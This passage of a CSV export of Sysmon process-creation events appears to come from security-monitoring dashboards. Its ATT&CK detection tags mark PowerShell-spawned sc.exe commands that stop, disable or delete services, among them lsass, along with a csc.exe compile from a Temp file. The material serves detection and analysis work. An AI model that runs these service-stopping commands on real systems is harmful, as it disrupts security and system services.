Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Microsoft Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.730",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.751 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010a3241900} +ProcessId: 6036 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.753746100Z"",""eventRecordID"":""2030"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.751\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010a3241900}\r\nProcessId: 6036\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.751"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010a3241900}"",""processId"":""6036"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.684",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.706 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010f4211900} +ProcessId: 6864 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.708346900Z"",""eventRecordID"":""2027"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.706\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010f4211900}\r\nProcessId: 6864\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:33.706"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010f4211900}"",""processId"":""6864"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.634",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.679 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-00102c201900} +ProcessId: 2528 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.682063000Z"",""eventRecordID"":""2024"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.679\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-00102c201900}\r\nProcessId: 2528\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.679"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-00102c201900}"",""processId"":""2528"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.603",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.664 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-00108b1e1900} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.669997200Z"",""eventRecordID"":""2022"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.664\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-00108b1e1900}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.664"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-00108b1e1900}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.526",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.618 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010ce1b1900} +ProcessId: 6428 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.621467200Z"",""eventRecordID"":""2019"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.618\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010ce1b1900}\r\nProcessId: 6428\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.618"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010ce1b1900}"",""processId"":""6428"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.493",14,"ATT&CK T1500: Suspicious Csc.exe Source File Folder","""Process Create: +RuleName: 
+UtcTime: 2020-05-28 12:49:33.536 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010b2161900} +ProcessId: 4756 +Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe +FileVersion: 4.8.3752.0 built by: NET48REL1 +Description: Visual C# Command Line Compiler +Product: Microsoft® .NET Framework +Company: Microsoft Corporation +OriginalFileName: csc.exe +CommandLine: ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\John Williams\AppData\Local\Temp\uwgfgufv.cmdline"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D +ParentProcessGuid: {df9fc3d3-b358-5ecf-0000-0010a3db1800} +ParentProcessId: 1116 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\uwgfgufv.cmdline\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.550119500Z"",""eventRecordID"":""2017"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.536\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010b2161900}\r\nProcessId: 4756\r\nImage: 
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.8.3752.0 built by: NET48REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\uwgfgufv.cmdline\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D\r\nParentProcessGuid: {df9fc3d3-b358-5ecf-0000-0010a3db1800}\r\nParentProcessId: 1116\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.536"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010b2161900}"",""processId"":""4756"",""image"":""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe"",""fileVersion"":""4.8.3752.0 built by: NET48REL1"",""description"":""Visual C# Command Line Compiler"",""product"":""Microsoft® .NET Framework"",""company"":""Microsoft Corporation"",""originalFileName"":""csc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\"" /noconfig /fullpaths @\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\uwgfgufv.cmdline\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
